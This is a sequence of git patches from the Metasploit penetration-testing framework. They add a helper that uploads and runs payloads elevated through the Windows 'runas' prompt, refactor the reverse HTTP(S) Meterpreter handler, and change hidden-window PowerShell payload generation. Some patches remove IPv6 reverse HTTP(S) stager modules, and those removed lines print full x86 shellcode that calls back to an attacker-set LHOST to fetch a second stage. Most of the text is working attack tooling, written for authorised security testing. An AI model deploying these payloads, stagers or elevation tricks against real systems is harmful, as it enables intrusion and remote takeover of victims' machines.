+      execute_psh
     end
   end
 end
+

From 7b2f0a64fc1bd648acc04eb637686cc7e543a86f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 22 Mar 2014 18:07:57 +0000
Subject: [PATCH 068/321] Tidy up

---
 lib/msf/core/post/windows.rb          |  1 +
 lib/msf/core/post/windows/runas.rb    | 40 +++++++++++++++++++++++++++
 modules/exploits/windows/local/ask.rb |  4 +--
 3 files changed, 43 insertions(+), 2 deletions(-)
 create mode 100644 lib/msf/core/post/windows/runas.rb

diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb
index a504e65670..2036d05da3 100644
--- a/lib/msf/core/post/windows.rb
+++ b/lib/msf/core/post/windows.rb
@@ -9,6 +9,7 @@ module Msf::Post::Windows
   require 'msf/core/post/windows/process'
   require 'msf/core/post/windows/railgun'
   require 'msf/core/post/windows/registry'
+  require 'msf/core/post/windows/runas'
   require 'msf/core/post/windows/services'
   require 'msf/core/post/windows/shadowcopy'
   require 'msf/core/post/windows/user_profiles'
diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
new file mode 100644
index 0000000000..51c9e996c9
--- /dev/null
+++ b/lib/msf/core/post/windows/runas.rb
@@ -0,0 +1,40 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/powershell'
+require 'msf/core/exploit/exe'
+
+module Msf::Post::Windows::Runas
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Powershell
+
+  def execute_exe(filename=nil, path=nil, upload=nil)
+    exe_payload = generate_payload_exe
+    payload_filename = filename || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    payload_path = path || get_env('TEMP')
+    cmd_location = "#{payload_path}\\#{payload_filename}"
+
+    if upload
+      print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+      write_file(cmd_location, exe_payload)
+    else
+      print_error("No Upload Path!")
+      return
+    end
+
+    command = cmd_location
+    shell_exec(command, nil)
+  end
+
+  def execute_psh
+    command,args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}"
+    shell_exec(command,args)
+  end
+
+  def shell_exec(command, args)
+    print_status("Executing elevated command!")
+    session.railgun.shell32.ShellExecuteA(nil, "runas", command, args, nil, 5)
+  end
+end
+
diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
index 86f11f7718..f8bd7e016b 100644
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     register_options([
       OptString.new("FILENAME", [ false, "File name on disk"]),
-      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
+      OptString.new("PATH", [ false, "Location on disk, %TEMP% used if not set" ]),
       OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
       OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
     ])
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Local
     #
     case datastore["TECHNIQUE"]
     when "EXE"
-      execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
+      execute_exe(datastore["FILENAME"], datastore["PATH"], datastore["UPLOAD"])
     when "PSH"
       execute_psh
     end

From d53b56c161b9acb5d604513b312d4be4333e195b Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 22 Mar 2014 18:38:58 +0000
Subject: [PATCH 069/321] Tidy up

---
 lib/msf/core/post/windows/runas.rb | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
index 51c9e996c9..1c29b19e26 100644
--- a/lib/msf/core/post/windows/runas.rb
+++ b/lib/msf/core/post/windows/runas.rb
@@ -10,31 +10,31 @@ module Msf::Post::Windows::Runas
   include Msf::Exploit::Powershell
 
   def execute_exe(filename=nil, path=nil, upload=nil)
-    exe_payload = generate_payload_exe
     payload_filename = filename || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
     payload_path = path || get_env('TEMP')
     cmd_location = "#{payload_path}\\#{payload_filename}"
 
     if upload
+      exe_payload = generate_payload_exe
       print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
       write_file(cmd_location, exe_payload)
     else
-      print_error("No Upload Path!")
-      return
+      print_status("No file uploaded, attempting to execute #{cmd_location}...")
     end
 
-    command = cmd_location
-    shell_exec(command, nil)
+    shell_exec(command_location, nil)
   end
 
   def execute_psh
-    command,args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}"
-    shell_exec(command,args)
+    powershell_command = cmd_psh_payload(payload.encoded)
+    command = 'cmd.exe'
+    args = "/c #{powershell_command}"
+    shell_exec(command, args)
   end
 
   def shell_exec(command, args)
-    print_status("Executing elevated command!")
-    session.railgun.shell32.ShellExecuteA(nil, "runas", command, args, nil, 5)
+    print_status("Executing elevated command...")
+    session.railgun.shell32.ShellExecuteA(nil, 'runas', command, args, nil, 'SW_SHOW')
   end
 end
 

From 549e3065725b90956b344d412e70c35f06dcf122 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 16 Apr 2014 18:32:35 -0500
Subject: [PATCH 070/321] Remove superfluous v6 http{,s} payload and handler

---
 lib/msf/core/handler/reverse_http.rb          | 100 +++++++++++-------
 .../core/handler/reverse_http/uri_checksum.rb |   2 +
 lib/msf/core/handler/reverse_ipv6_http.rb     |  34 ------
 lib/msf/core/handler/reverse_ipv6_https.rb    |  35 ------
 .../payloads/stagers/windows/reverse_http.rb  |   8 +-
 .../stagers/windows/reverse_ipv6_http.rb      |  91 ----------------
 6 files changed, 69 insertions(+), 201 deletions(-)
 delete mode 100644 lib/msf/core/handler/reverse_ipv6_http.rb
 delete mode 100644 lib/msf/core/handler/reverse_ipv6_https.rb
 delete mode 100644 modules/payloads/stagers/windows/reverse_ipv6_http.rb

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 5c26a0c4bd..75276cb6b4 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -31,27 +31,6 @@ module ReverseHttp
     "tunnel"
   end
 
-  #
-  # Use the +refname+ to determine whether this handler uses SSL or not
-  #
-  def ssl?
-    !!(self.refname.index("https"))
-  end
-
-  #
-  # Return a URI of the form scheme://host:port/
-  #
-  # Scheme is one of http or https and host is properly wrapped in [] for ipv6
-  # addresses.
-  #
-  def full_uri
-    local_port = bind_port
-    scheme = (ssl?) ? "https" : "http"
-    "#{scheme}://#{datastore['LHOST']}:#{datastore['LPORT']}/"
-  end
-
-
-
   #
   # Initializes the HTTP SSL tunneling handler.
   #
@@ -77,14 +56,64 @@ module ReverseHttp
       ], Msf::Handler::ReverseHttp)
   end
 
-  #
   # Toggle for IPv4 vs IPv6 mode
   #
-  def ipv6
-    self.refname.index('ipv6') ? true : false
+  def ipv6?
+    Rex::Socket.is_ipv6?(datastore['LHOST'])
   end
 
+  # Determine where to bind the server
   #
+  # @return [String]
+  def listener_address
+    if datastore['ReverseListenerBindAddress'].to_s.empty?
+      bindaddr = (ipv6?) ? '::' : '0.0.0.0'
+    else
+      bindaddr = datastore['ReverseListenerBindAddress']
+    end
+
+    bindaddr
+  end
+
+  # @return [String] A URI of the form +scheme://host:port/+
+  def listener_uri
+    if ipv6?
+      listen_host = "[#{listener_address}]"
+    else
+      listen_host = listener_address
+    end
+    "#{scheme}://#{listen_host}:#{datastore['LPORT']}/"
+  end
+
+  # Return a URI suitable for placing in a payload.
+  #
+  # Host will be properly wrapped in square brackets, +[]+, for ipv6
+  # addresses.
+  #
+  # @return [String] A URI of the form +scheme://host:port/+
+  def payload_uri
+    if ipv6?
+      callback_host = "[#{datastore['LHOST']}]"
+    else
+      callback_host = datastore['LHOST']
+    end
+    "#{scheme}://#{callback_host}:#{datastore['LPORT']}/"
+  end
+
+  # Use the {#refname} to determine whether this handler uses SSL or not
+  #
+  def ssl?
+    !!(self.refname.index("https"))
+  end
+
+  # URI scheme
+  #
+  # @return [String] One of "http" or "https" depending on whether we
+  #   are using SSL
+  def scheme
+    (ssl?) ? "https" : "http"
+  end
+
   # Create an HTTP listener
   #
   def setup_handler
@@ -98,17 +127,11 @@ module ReverseHttp
 
     local_port = bind_port
 
-    # Determine where to bind the HTTP(S) server to
-    bindaddrs = ipv6 ? '::' : '0.0.0.0'
-
-    if not datastore['ReverseListenerBindAddress'].to_s.empty?
-      bindaddrs = datastore['ReverseListenerBindAddress']
-    end
 
     # Start the HTTPS server service on this host/port
     self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
       local_port,
-      bindaddrs,
+      listener_address,
       ssl?,
       {
         'Msf'        => framework,
@@ -130,9 +153,7 @@ module ReverseHttp
       },
       'VirtualDirectory' => true)
 
-    scheme = (ssl?) ? "https" : "http"
-    bind_url = "#{scheme}://#{bindaddrs}:#{local_port}/"
-    print_status("Started #{scheme.upcase} reverse handler on #{bind_url}")
+    print_status("Started #{scheme.upcase} reverse handler on #{listener_uri}")
   end
 
   #
@@ -165,7 +186,6 @@ protected
   # Parses the HTTPS request
   #
   def on_request(cli, req, obj)
-    sid  = nil
     resp = Rex::Proto::Http::Response.new
 
     print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
@@ -176,7 +196,7 @@ protected
     case uri_match
       when /^\/INITJM/
         conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-        url = full_uri + conn_id + "/\x00"
+        url = payload_uri + conn_id + "/\x00"
 
         blob = ""
         blob << obj.generate_stage
@@ -239,10 +259,10 @@ protected
               blob[i, proxyinfo.length] = proxyinfo
               print_status("Activated custom proxy #{proxyinfo}, patch at offset #{i}...")
               #Optional authentification
-              unless 	(datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
+              unless (datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
                 (datastore['PROXY_PASSWORD'].nil? or datastore['PROXY_PASSWORD'].empty?) or
                 datastore['PROXY_TYPE'] == 'SOCKS'
-                
+
                 proxy_username_loc = blob.index("METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
                 proxy_username = datastore['PROXY_USERNAME'] << "\x00"
                 blob[proxy_username_loc, proxy_username.length] = proxy_username
@@ -266,7 +286,7 @@ protected
         conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
         i = blob.index("https://" + ("X" * 256))
         if i
-          url = full_uri + conn_id + "/\x00"
+          url = payload_uri + conn_id + "/\x00"
           blob[i, url.length] = url
         end
         print_status("Patched URL at offset #{i}...")
@@ -308,7 +328,7 @@ protected
         create_session(cli, {
           :passive_dispatcher => obj.service,
           :conn_id            => conn_id,
-          :url                => full_uri + conn_id + "/\x00",
+          :url                => payload_uri + conn_id + "/\x00",
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
diff --git a/lib/msf/core/handler/reverse_http/uri_checksum.rb b/lib/msf/core/handler/reverse_http/uri_checksum.rb
index a55c302c00..e89c753dcf 100644
--- a/lib/msf/core/handler/reverse_http/uri_checksum.rb
+++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb
@@ -45,6 +45,7 @@ module Msf
 
         # Map "random" URIs to static strings, allowing us to randomize
         # the URI sent in the first request.
+        #
         # @param uri_match [String] The URI string to convert back to the original static value
         # @return [String] The static URI value derived from the checksum
         def process_uri_resource(uri_match)
@@ -69,6 +70,7 @@ module Msf
         end
 
         # Create a URI that matches a given checksum
+        #
         # @param sum [Fixnum] The checksum value you are trying to create a URI for
         # @return [String] The URI string that checksums to the given value
         def generate_uri_checksum(sum)
diff --git a/lib/msf/core/handler/reverse_ipv6_http.rb b/lib/msf/core/handler/reverse_ipv6_http.rb
deleted file mode 100644
index e3861d3b8b..0000000000
--- a/lib/msf/core/handler/reverse_ipv6_http.rb
+++ /dev/null
@@ -1,34 +0,0 @@
-# -*- coding: binary -*-
-require 'msf/core/handler/reverse_http'
-
-module Msf
-module Handler
-
-###
-#
-# This handler implements the HTTP tunneling interface.
-#
-###
-module ReverseIPv6Http
-
-  include Msf::Handler::ReverseHttp
-
-  #
-  # Override the handler_type to indicate IPv6 mode
-  #
-  def self.handler_type
-    return "reverse_ipv6_http"
-  end
-
-  #
-  # Returns the connection-described general handler type, in this case
-  # 'tunnel'.
-  #
-  def self.general_handler_type
-    "tunnel"
-  end
-
-end
-end
-end
-
diff --git a/lib/msf/core/handler/reverse_ipv6_https.rb b/lib/msf/core/handler/reverse_ipv6_https.rb
deleted file mode 100644
index b0c22158e2..0000000000
--- a/lib/msf/core/handler/reverse_ipv6_https.rb
+++ /dev/null
@@ -1,35 +0,0 @@
-# -*- coding: binary -*-
-require 'msf/core/handler/reverse_http'
-require 'msf/core/handler/reverse_https'
-
-module Msf
-module Handler
-
-###
-#
-# This handler implements the HTTP SSL tunneling interface.
-#
-###
-module ReverseIPv6Https
-
-  include Msf::Handler::ReverseHttps
-
-  #
-  # Override the handler_type to indicate IPv6 mode
-  #
-  def self.handler_type
-    return "reverse_ipv6_https"
-  end
-
-  #
-  # Returns the connection-described general handler type, in this case
-  # 'tunnel'.
-  #
-  def self.general_handler_type
-    "tunnel"
-  end
-
-end
-end
-end
-
diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb
index 505f889864..cc527035af 100644
--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -79,7 +79,13 @@ module Metasploit3
     i = p.index("/12345\x00")
     u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
     p[i, u.length] = u
-    p + datastore['LHOST'].to_s + "\x00"
+
+    lhost = datastore['LHOST'] || Rex::Socket.source_address
+    if Rex::Socket.is_ipv6?(lhost)
+      lhost = "[#{lhost}]"
+    end
+
+    p + lhost + "\x00"
   end
 
   #
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb
deleted file mode 100644
index d4dd790a69..0000000000
--- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb
+++ /dev/null
@@ -1,91 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-
-require 'msf/core'
-require 'msf/core/handler/reverse_ipv6_http'
-
-
-module Metasploit3
-
-  include Msf::Payload::Stager
-  include Msf::Payload::Windows
-
-  def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Reverse HTTP Stager (IPv6)',
-      'Description'   => 'Tunnel communication over HTTP and IPv6',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::ReverseIPv6Http,
-      'Convention'    => 'sockedi http',
-      'Stager'        =>
-        {
-          'Offsets' =>
-            {
-              # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
-              # 'EXITFUNC' => [ 290, 'V' ],
-              'LPORT'    => [ 190, 'v' ], # Not a typo, really little endian
-            },
-          'Payload' =>
-              "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-              "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-              "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-              "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-              "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-              "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-              "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-              "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-              "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-              "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
-              "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
-              "\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
-              "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
-              "\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
-              "\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
-              "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
-              "\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
-              "\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
-              "\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
-              "\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
-              "\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
-        }
-      ))
-  end
-
-  #
-  # Do not transmit the stage over the connection.  We handle this via HTTPS
-  #
-  def stage_over_connection?
-    false
-  end
-
-  #
-  # Generate the first stage
-  #
-  def generate
-    p = super
-    i = p.index("/12345\x00")
-    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
-    p[i, u.length] = u
-
-    lhost = datastore['LHOST'] || "0000:0000:0000:0000:0000:0000:0000:0000"
-    if Rex::Socket.is_ipv6?(lhost)
-      lhost = "[#{lhost}]"
-    end
-
-    p + lhost + "\x00"
-  end
-
-  #
-  # Always wait at least 20 seconds for this payload (due to staging delays)
-  #
-  def wfs_delay
-    20
-  end
-
-end

From af899254a3b06a9854652d33489a2848c16ef1c0 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Wed, 16 Apr 2014 19:14:17 -0500
Subject: [PATCH 071/321] Missed file

---
 .../stagers/windows/reverse_ipv6_https.rb     | 90 -------------------
 1 file changed, 90 deletions(-)
 delete mode 100644 modules/payloads/stagers/windows/reverse_ipv6_https.rb

diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb
deleted file mode 100644
index fd0206c91c..0000000000
--- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb
+++ /dev/null
@@ -1,90 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'msf/core/handler/reverse_ipv6_https'
-
-module Metasploit3
-
-  include Msf::Payload::Stager
-  include Msf::Payload::Windows
-
-  def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Reverse HTTPS Stager (IPv6)',
-      'Description'   => 'Tunnel communication over HTTP using SSL and IPv6',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::ReverseIPv6Https,
-      'Convention'    => 'sockedi https',
-      'Stager'        =>
-        {
-          'Offsets' =>
-            {
-              # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
-              # 'EXITFUNC' => [ 290, 'V' ],
-              'LPORT'    => [ 190, 'v' ], # Not a typo, really little endian
-            },
-          'Payload' =>
-            "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-            "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-            "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-            "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-            "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-            "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-            "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-            "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-            "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
-            "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
-            "\xFF\xD5\xEB\x5F\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
-            "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x48\x59\x31\xD2" +
-            "\x52\x68\x00\x32\xA0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
-            "\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x68\x80\x33\x00\x00\x89\xE0\x6A" +
-            "\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5\x31\xFF\x57\x57" +
-            "\x57\x57\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74" +
-            "\x10\xEB\xD5\xEB\x49\xE8\xB3\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35" +
-            "\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68" +
-            "\x00\x00\x40\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89" +
-            "\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5" +
-            "\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x51" +
-            "\xFF\xFF\xFF"
-        }
-      ))
-  end
-
-  #
-  # Do not transmit the stage over the connection.  We handle this via HTTPS
-  #
-  def stage_over_connection?
-    false
-  end
-
-  #
-  # Generate the first stage
-  #
-  def generate
-    p = super
-    i = p.index("/12345\x00")
-    u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
-    p[i, u.length] = u
-
-    lhost = datastore['LHOST'] || "0000:0000:0000:0000:0000:0000:0000:0000"
-    if Rex::Socket.is_ipv6?(lhost)
-      lhost = "[#{lhost}]"
-    end
-
-    p + lhost + "\x00"
-  end
-
-  #
-  # Always wait at least 20 seconds for this payload (due to staging delays)
-  #
-  def wfs_delay
-    20
-  end
-end

From 9f05760c50aae12910c7fd0d6a0353e5bfd1133e Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Fri, 18 Apr 2014 00:28:48 -0400
Subject: [PATCH 072/321] Merge with Meatballs' initial changes

Clean up arch detection code and dedup Msf/Rex
Reduce generated payload size
---
 lib/msf/core/exploit/powershell.rb |  35 +++------
 lib/rex/exploitation/powershell.rb | 119 ++++++++++++++---------------
 2 files changed, 67 insertions(+), 87 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 24c8f6619b..2e3a320827 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -4,8 +4,8 @@ require 'rex/exploitation/powershell'
 module Msf
 module Exploit::Powershell
 
-  class PowershellScript < Rex::Exploitation::Powershell::Script
-  end
+  PowershellScript = Rex::Exploitation::Powershell::Script
+
 
   def initialize(info = {})
     super
@@ -71,7 +71,7 @@ module Exploit::Powershell
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
-    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v == 'true' }.keys.map do |k|
+    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
@@ -87,7 +87,7 @@ module Exploit::Powershell
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
-    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v == 'true' }.keys.map do |k|
+    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
@@ -162,7 +162,7 @@ module Exploit::Powershell
     end
 
     # Shorten arg if PSH 2.0+
-    if opts[:shorten] and !datastore['Powershell::method'].downcase.strip == 'old'
+    if opts[:shorten]
       arg_string.gsub!(' -Command ', ' -c ')
       arg_string.gsub!(' -EncodedCommand ', ' -e ')
       arg_string.gsub!(' -ExecutionPolicy ', ' -ep ')
@@ -189,10 +189,12 @@ module Exploit::Powershell
   # Runs powershell in hidden window raising interactive proc msg
   # Detect the architecture
   #
+
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {
         :noprofile => true,
         :windowstyle => 'hidden',
+        :shorten => false
     }
 
     if encoded
@@ -202,36 +204,27 @@ module Exploit::Powershell
     end
 
     # Old technique fails if powershell exits..
-    arg_opts[:noexit] = true if datastore['Powershell::method'] == 'old'
+    arg_opts[:noexit] = true if datastore['PSH::method'] == 'old'
 
     ps_args = generate_psh_args(arg_opts)
 
-    if payload_arch == 'x86'
-      arch_x86 = '$True'
-    else
-      arch_x86 = '$False'
-    end
-
     process_start_info = <<EOS
 $s=New-Object System.Diagnostics.ProcessStartInfo
 $s.FileName=$b
 $s.Arguments='#{ps_args}'
 $s.UseShellExecute=$false
-$si.RedirectStandardOutput=$true
-$si.WindowStyle='Hidden'
-$si.CreateNoWindow=$True
 $p=[System.Diagnostics.Process]::Start($s)
 EOS
     process_start_info.gsub!("\n",';')
 
     archictecure_detection = <<EOS
-$a=#{arch_x86};
 if([IntPtr]::Size -eq 4){
 #{payload_arch == 'x86' ? "$b='powershell.exe'" : "$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'"}
 }else{
-#{payload_arch == 'x86' ? "{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" : "$b='powershell.exe'"}
+#{payload_arch == 'x86' ? "$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" : "$b='powershell.exe'"}
 };
 EOS
+
     archictecure_detection.gsub!("\n","")
 
     archictecure_detection + process_start_info
@@ -274,13 +267,6 @@ EOS
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
-    if datastore['Powershell::prepend_sleep']
-      if datastore['Powershell::prepend_sleep'].to_i > 0
-        psh_payload = "Start-Sleep -s #{datastore['Powershell::prepend_sleep']};" << psh_payload
-      else
-        vprint_error('Sleep time must be greater than 0 seconds')
-      end
-    end
 
     if opts[:prepend_sleep]
       if opts[:prepend_sleep].to_i > 0
@@ -365,6 +351,7 @@ EOS
   module PshMethods
     include Rex::Exploitation::Powershell::PshMethods
   end
+
 end
 end
 
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index a659661cb4..2b03e99632 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -127,14 +127,9 @@ module Powershell
   end
 
   module Parser
-
-    #
-    # Get variable names from code, removes reserved names from return
-    #
-    def get_var_names
-      # Reserved special variables
-      # Acquired with: Get-Variable | Format-Table name, value -auto
-      res_vars = [
+    # Reserved special variables
+    # Acquired with: Get-Variable | Format-Table name, value -auto
+    RESERVED_VARIABLE_NAMES = [
         '$$',
         '$?',
         '$^',
@@ -187,12 +182,14 @@ module Powershell
         '$VerbosePreference',
         '$WarningPreference',
         '$WhatIfPreference'
-      ].map(&:downcase)
-
-      # return code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten - res_vars
+      ].map(&:downcase).freeze
 
+    #
+    # Get variable names from code, removes reserved names from return
+    #
+    def get_var_names
       our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
-      return our_vars.select {|v| !res_vars.include?(v)}
+      return our_vars.select {|v| !RESERVED_VARIABLE_NAMES.include?(v.downcase)}
     end
 
     #
@@ -219,7 +216,7 @@ module Powershell
     end
 
     #
-    # Return matching backet type
+    # Return matching bracket type
     #
     def match_start(char)
       case char
@@ -373,6 +370,7 @@ module Powershell
